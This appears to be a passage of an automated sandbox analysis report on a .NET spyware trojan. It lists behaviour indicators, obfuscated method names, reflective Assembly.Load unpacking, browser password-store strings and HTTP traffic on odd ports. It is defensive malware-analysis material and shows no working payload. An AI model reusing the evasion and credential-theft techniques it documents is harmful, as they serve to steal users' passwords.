Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, KpXSP7a4XKGwMYNe9W.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, KpXSP7a4XKGwMYNe9W.cs	Security API names: _0020.AddAccessRule
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, KpXSP7a4XKGwMYNe9W.cs	Security API names: _0020.SetAccessControl
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, KpXSP7a4XKGwMYNe9W.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, KpXSP7a4XKGwMYNe9W.cs	Security API names: _0020.AddAccessRule
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, g9F7EWXCs481SYWDaY.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, g9F7EWXCs481SYWDaY.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/45@1/1

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lWnSA7IyVc.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe

File created: C:\Users\user\AppData\Local\Temp\tmp42CB.tmp

Jump to behavior

Source: lWnSA7IyVc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: lWnSA7IyVc.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmp42DB.tmp.2.dr, tmp42ED.tmp.2.dr, tmp42CB.tmp.2.dr, tmp42FE.tmp.2.dr, tmp42EE.tmp.2.dr, tmp42EC.tmp.2.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: lWnSA7IyVc.exe

ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\lWnSA7IyVc.exe "C:\Users\user\Desktop\lWnSA7IyVc.exe"
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process created: C:\Users\user\Desktop\lWnSA7IyVc.exe "C:\Users\user\Desktop\lWnSA7IyVc.exe"
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process created: C:\Users\user\Desktop\lWnSA7IyVc.exe "C:\Users\user\Desktop\lWnSA7IyVc.exe"	Jump to behavior

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: lWnSA7IyVc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: lWnSA7IyVc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.lWnSA7IyVc.exe.50e0000.4.raw.unpack, kAOj1Y7pfP90kycNNw.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.lWnSA7IyVc.exe.50e0000.4.raw.unpack, GtaAIbrHXObmMm8GPA.cs	.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, KpXSP7a4XKGwMYNe9W.cs	.Net Code: jVNRG9d43l System.Reflection.Assembly.Load(byte[])
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, KpXSP7a4XKGwMYNe9W.cs	.Net Code: jVNRG9d43l System.Reflection.Assembly.Load(byte[])

Source: lWnSA7IyVc.exe

Static PE information: section name: .text entropy: 7.7812990489221505

Source: 0.2.lWnSA7IyVc.exe.50e0000.4.raw.unpack, FZaOUuOPvnEAfIAr0M.cs	High entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
Source: 0.2.lWnSA7IyVc.exe.50e0000.4.raw.unpack, GtaAIbrHXObmMm8GPA.cs	High entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
Source: 0.2.lWnSA7IyVc.exe.50e0000.4.raw.unpack, kAOj1Y7pfP90kycNNw.cs	High entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, VsPtLqRMytadQ9l4MR.cs	High entropy of concatenated method names: 'ok0289F7EW', 'Ss42a81SYW', 'BqA29N8fhF', 'wYU2kIGUJ7', 'jtH2v2xZJQ', 'c0G2cjDttD', 'e4uXGX4RgGatVBl1Jq', 'KKLMSZsWEnCqiaevhM', 'aCL22iUiGw', 'UZB2gMHiW6'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, aJQI0GBjDttDxfoH5X.cs	High entropy of concatenated method names: 'jtjpnjMtii', 'iaUp0T3HX0', 'WVQp3chJ9h', 'lxep8r21xV', 'YcPpa0Zw44', 'CZ13s3Np12', 'Rog31dc5ri', 'h5Y3tjhbbh', 'O2a3T4hVU1', 'Ulk3Wp9nsn'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, b6u3aYzhhBXOqZ6a4R.cs	High entropy of concatenated method names: 'gNeOeq4psF', 'pkcOXc7JII', 'RofOmBaV0S', 'dOjOB71Gfc', 'IapOwW1XPu', 'quhOYg1Jf6', 'ohLOF1VQgb', 'OHQOHA3DDZ', 'EEXON2tIgp', 'iu9O6hiYiS'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, zUJ7q7JgFuSt78tH2x.cs	High entropy of concatenated method names: 'fQc3oLEswA', 'mg93PODNf4', 'nrLiEglYqQ', 'i9miYVHHl0', 'TF4iFuCBly', 'SfriuQNWve', 'ahJiSHVlue', 'oAsiUmF3AD', 'ulkiKZD3mW', 'h9wifCjXqk'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, ggpxgV22UfmQin6KbTQ.cs	High entropy of concatenated method names: 'y8hOqkX3pC', 'i2OOzsKy1R', 'YGIyZiAjj6', 'BXdy2VkUbk', 'FLvyIY5AdM', 'dYaygtYPWW', 'hKxyRoieU4', 'RshynjHhEd', 'DbFylmZhVv', 'cpBy05R28O'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, tleP4YIiwJqF027VDX.cs	High entropy of concatenated method names: 'gfUGZ976C', 'nW5DpvvxW', 'PeHeNtE0i', 'I8GPyEnsW', 'HX7mJflgI', 'kQUJSswCc', 'HK6wNltgJW8dRsMACk', 'uI1ePGRPylRNDgU9wN', 'S3V4xYhGq', 'KZ6OjHECV'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, KpXSP7a4XKGwMYNe9W.cs	High entropy of concatenated method names: 'Vd9gntZRh5', 'xluglUonnu', 'wD4g0fUHgH', 'bL2giUbr8O', 'Ylgg3OSfZq', 'KrugpuJkBx', 'tUVg8tVALJ', 'tuSgalS6uW', 'OOpg5RnWug', 'RDng98NZj0'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, HUUmEfVh2jcPCYrDet.cs	High entropy of concatenated method names: 'E1idXJFopS', 'q6Mdmxu0va', 'bC4dBMsCy4', 'UaedwGEZX7', 'kkTdY4QvC8', 'a1IdFV3YoI', 'h44dSW2aNg', 'f4fdUmOaQs', 'A8ndfFu6la', 'plZdxvMY3T'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, JDh1uomqAN8fhF7YUI.cs	High entropy of concatenated method names: 'XnUiDH9FCE', 'VrEiek1NHr', 'uNliXG5CO1', 'Ro5imWEMWJ', 'zrpivdDwq9', 'RATiciYT0F', 'mupiLcJTpK', 'Bv6i42KHi0', 'XP8ijKCDeV', 'YXviOUHxy2'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, JuOaI01AsuEZve1SER.cs	High entropy of concatenated method names: 'hy6LTxugN3', 'WIqLqH8Gae', 'fVU4Z4IBuD', 'DI242jOTVa', 'VU0LxnyHAS', 'W8XLQHiCSf', 'StYLVwBV8R', 'kyXLMVDGZ1', 'rPFLCnD58P', 'kKBLrg8ir5'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, t0nTevAGjsUiVgkmZ0.cs	High entropy of concatenated method names: 'Jn9L9GpbgV', 's9aLkOwitr', 'ToString', 'E0kLlUr4Ke', 'SN7L0dP74R', 'wK5Li2JGR5', 'snZL3hQHrU', 'W2xLpYQYht', 'nEmL8DY2sG', 'dB5LanvpHj'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, g9F7EWXCs481SYWDaY.cs	High entropy of concatenated method names: 'Cvd0Mg4M2S', 'gCm0Cq1d2R', 'LEl0rXvHSO', 'YV50A9clP5', 'jf50sA1dC2', 'enG01W1Tnw', 'J080tTBneW', 'heu0TLxXsI', 'Unt0WRStPP', 'iZo0qh6ERT'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, LHfvEY2R7w7o13anfyU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OXThjrsTWt', 'JWhhOMbv8X', 'QeRhyp4XGD', 'lsmhhCLEpa', 'xUFhbYqyqL', 'pE1h7kQwXm', 'wFjhHWTnKp'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, T5i99LrmMRnLQYweiS.cs	High entropy of concatenated method names: 'ToString', 'qGycxBa6nG', 'N98cwrK4tO', 'BjIcEVRHT7', 'W3JcY82bSu', 'L0gcFU85wQ', 'xKjcunuohO', 'SfPcSwwRAq', 'lJ6cUsZCcG', 'qpAcKD5vmD'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, gLIrIXKHyDWiCRvqAk.cs	High entropy of concatenated method names: 'Lgr8NrQ8dX', 'lMK86D0btM', 'u5e8GwckXI', 'Qt28DR525n', 'AX68ovBOhQ', 'qU38e55Ppo', 'sUs8Peaql5', 'Oqc8X9A5Gx', 'PhE8my1nU3', 'X8R8JTVM97'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, wn0WN32ZDZsP65xpk2y.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'P22OxHtqA8', 'BCPOQfN2DZ', 'UX4OVcNLvj', 'awhOMRu5IS', 'cD0OCaaPQS', 'Sj0OrQwaOU', 'NWVOAZ9jVK'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, el1EGB0yXPWDaA8vEl.cs	High entropy of concatenated method names: 'Dispose', 'ThY2W87NHJ', 'SbmIwub90T', 'L9Aq0hJwtR', 'rch2qEv5PA', 'om82z7GvyN', 'ProcessDialogKey', 'VpyIZxyNmp', 'MNSI2y2kmR', 'DF7IIuTo23'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, uxyNmpWUNSy2kmRPF7.cs	High entropy of concatenated method names: 'fHDjBmA4Rm', 'CyKjwis3dY', 'L4gjEXpHTx', 'kZjjYLCXZ6', 'Ep8jFRu3SW', 'VDkju9288B', 'mLxjS3UOVN', 'a33jUFy8ri', 'SGwjKD1sYu', 'kaGjftn002'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, Xx93d2M4px6wCS11mw.cs	High entropy of concatenated method names: 'McAvfX5YsO', 'kN1vQP5Ae8', 'JttvMIgaDE', 'qagvCUFEuG', 'nRYvwPmkCL', 'hmjvENHMix', 'WObvYhsNPC', 'XmlvFf3Itx', 'dwYvuBjZi0', 'TgavSlo2Fa'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, jMKDNQtI1AhY87NHJ4.cs	High entropy of concatenated method names: 'zlUjvVPxcn', 'GPOjLpMcMP', 'GVXjj1ZNvc', 'Svrjyb5yiy', 'Lacjb7QjJT', 'tagjHPqSW9', 'Dispose', 'Gqi4lIcuUe', 'aE9407CcOG', 'xZL4i672Nw'
Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, dQYy7NSINxkIPPq6UJ.cs	High entropy of concatenated method names: 'o9v8lQKEfD', 'Vlo8iriJ0e', 'q0H8p8E8gT', 'J4RpqwcmBe', 'B2Mpzk2hPJ', 'fee8ZkNaHG', 'EOq82BNARj', 'aCB8I5bwJK', 'MMJ8gv5Rey', 'c2F8RITfJI'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, VsPtLqRMytadQ9l4MR.cs	High entropy of concatenated method names: 'ok0289F7EW', 'Ss42a81SYW', 'BqA29N8fhF', 'wYU2kIGUJ7', 'jtH2v2xZJQ', 'c0G2cjDttD', 'e4uXGX4RgGatVBl1Jq', 'KKLMSZsWEnCqiaevhM', 'aCL22iUiGw', 'UZB2gMHiW6'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, aJQI0GBjDttDxfoH5X.cs	High entropy of concatenated method names: 'jtjpnjMtii', 'iaUp0T3HX0', 'WVQp3chJ9h', 'lxep8r21xV', 'YcPpa0Zw44', 'CZ13s3Np12', 'Rog31dc5ri', 'h5Y3tjhbbh', 'O2a3T4hVU1', 'Ulk3Wp9nsn'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, b6u3aYzhhBXOqZ6a4R.cs	High entropy of concatenated method names: 'gNeOeq4psF', 'pkcOXc7JII', 'RofOmBaV0S', 'dOjOB71Gfc', 'IapOwW1XPu', 'quhOYg1Jf6', 'ohLOF1VQgb', 'OHQOHA3DDZ', 'EEXON2tIgp', 'iu9O6hiYiS'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, zUJ7q7JgFuSt78tH2x.cs	High entropy of concatenated method names: 'fQc3oLEswA', 'mg93PODNf4', 'nrLiEglYqQ', 'i9miYVHHl0', 'TF4iFuCBly', 'SfriuQNWve', 'ahJiSHVlue', 'oAsiUmF3AD', 'ulkiKZD3mW', 'h9wifCjXqk'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, ggpxgV22UfmQin6KbTQ.cs	High entropy of concatenated method names: 'y8hOqkX3pC', 'i2OOzsKy1R', 'YGIyZiAjj6', 'BXdy2VkUbk', 'FLvyIY5AdM', 'dYaygtYPWW', 'hKxyRoieU4', 'RshynjHhEd', 'DbFylmZhVv', 'cpBy05R28O'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, tleP4YIiwJqF027VDX.cs	High entropy of concatenated method names: 'gfUGZ976C', 'nW5DpvvxW', 'PeHeNtE0i', 'I8GPyEnsW', 'HX7mJflgI', 'kQUJSswCc', 'HK6wNltgJW8dRsMACk', 'uI1ePGRPylRNDgU9wN', 'S3V4xYhGq', 'KZ6OjHECV'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, KpXSP7a4XKGwMYNe9W.cs	High entropy of concatenated method names: 'Vd9gntZRh5', 'xluglUonnu', 'wD4g0fUHgH', 'bL2giUbr8O', 'Ylgg3OSfZq', 'KrugpuJkBx', 'tUVg8tVALJ', 'tuSgalS6uW', 'OOpg5RnWug', 'RDng98NZj0'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, HUUmEfVh2jcPCYrDet.cs	High entropy of concatenated method names: 'E1idXJFopS', 'q6Mdmxu0va', 'bC4dBMsCy4', 'UaedwGEZX7', 'kkTdY4QvC8', 'a1IdFV3YoI', 'h44dSW2aNg', 'f4fdUmOaQs', 'A8ndfFu6la', 'plZdxvMY3T'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, JDh1uomqAN8fhF7YUI.cs	High entropy of concatenated method names: 'XnUiDH9FCE', 'VrEiek1NHr', 'uNliXG5CO1', 'Ro5imWEMWJ', 'zrpivdDwq9', 'RATiciYT0F', 'mupiLcJTpK', 'Bv6i42KHi0', 'XP8ijKCDeV', 'YXviOUHxy2'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, JuOaI01AsuEZve1SER.cs	High entropy of concatenated method names: 'hy6LTxugN3', 'WIqLqH8Gae', 'fVU4Z4IBuD', 'DI242jOTVa', 'VU0LxnyHAS', 'W8XLQHiCSf', 'StYLVwBV8R', 'kyXLMVDGZ1', 'rPFLCnD58P', 'kKBLrg8ir5'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, t0nTevAGjsUiVgkmZ0.cs	High entropy of concatenated method names: 'Jn9L9GpbgV', 's9aLkOwitr', 'ToString', 'E0kLlUr4Ke', 'SN7L0dP74R', 'wK5Li2JGR5', 'snZL3hQHrU', 'W2xLpYQYht', 'nEmL8DY2sG', 'dB5LanvpHj'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, g9F7EWXCs481SYWDaY.cs	High entropy of concatenated method names: 'Cvd0Mg4M2S', 'gCm0Cq1d2R', 'LEl0rXvHSO', 'YV50A9clP5', 'jf50sA1dC2', 'enG01W1Tnw', 'J080tTBneW', 'heu0TLxXsI', 'Unt0WRStPP', 'iZo0qh6ERT'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, LHfvEY2R7w7o13anfyU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OXThjrsTWt', 'JWhhOMbv8X', 'QeRhyp4XGD', 'lsmhhCLEpa', 'xUFhbYqyqL', 'pE1h7kQwXm', 'wFjhHWTnKp'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, T5i99LrmMRnLQYweiS.cs	High entropy of concatenated method names: 'ToString', 'qGycxBa6nG', 'N98cwrK4tO', 'BjIcEVRHT7', 'W3JcY82bSu', 'L0gcFU85wQ', 'xKjcunuohO', 'SfPcSwwRAq', 'lJ6cUsZCcG', 'qpAcKD5vmD'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, gLIrIXKHyDWiCRvqAk.cs	High entropy of concatenated method names: 'Lgr8NrQ8dX', 'lMK86D0btM', 'u5e8GwckXI', 'Qt28DR525n', 'AX68ovBOhQ', 'qU38e55Ppo', 'sUs8Peaql5', 'Oqc8X9A5Gx', 'PhE8my1nU3', 'X8R8JTVM97'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, wn0WN32ZDZsP65xpk2y.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'P22OxHtqA8', 'BCPOQfN2DZ', 'UX4OVcNLvj', 'awhOMRu5IS', 'cD0OCaaPQS', 'Sj0OrQwaOU', 'NWVOAZ9jVK'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, el1EGB0yXPWDaA8vEl.cs	High entropy of concatenated method names: 'Dispose', 'ThY2W87NHJ', 'SbmIwub90T', 'L9Aq0hJwtR', 'rch2qEv5PA', 'om82z7GvyN', 'ProcessDialogKey', 'VpyIZxyNmp', 'MNSI2y2kmR', 'DF7IIuTo23'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, uxyNmpWUNSy2kmRPF7.cs	High entropy of concatenated method names: 'fHDjBmA4Rm', 'CyKjwis3dY', 'L4gjEXpHTx', 'kZjjYLCXZ6', 'Ep8jFRu3SW', 'VDkju9288B', 'mLxjS3UOVN', 'a33jUFy8ri', 'SGwjKD1sYu', 'kaGjftn002'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, Xx93d2M4px6wCS11mw.cs	High entropy of concatenated method names: 'McAvfX5YsO', 'kN1vQP5Ae8', 'JttvMIgaDE', 'qagvCUFEuG', 'nRYvwPmkCL', 'hmjvENHMix', 'WObvYhsNPC', 'XmlvFf3Itx', 'dwYvuBjZi0', 'TgavSlo2Fa'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, jMKDNQtI1AhY87NHJ4.cs	High entropy of concatenated method names: 'zlUjvVPxcn', 'GPOjLpMcMP', 'GVXjj1ZNvc', 'Svrjyb5yiy', 'Lacjb7QjJT', 'tagjHPqSW9', 'Dispose', 'Gqi4lIcuUe', 'aE9407CcOG', 'xZL4i672Nw'
Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, dQYy7NSINxkIPPq6UJ.cs	High entropy of concatenated method names: 'o9v8lQKEfD', 'Vlo8iriJ0e', 'q0H8p8E8gT', 'J4RpqwcmBe', 'B2Mpzk2hPJ', 'fee8ZkNaHG', 'EOq82BNARj', 'aCB8I5bwJK', 'MMJ8gv5Rey', 'c2F8RITfJI'

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
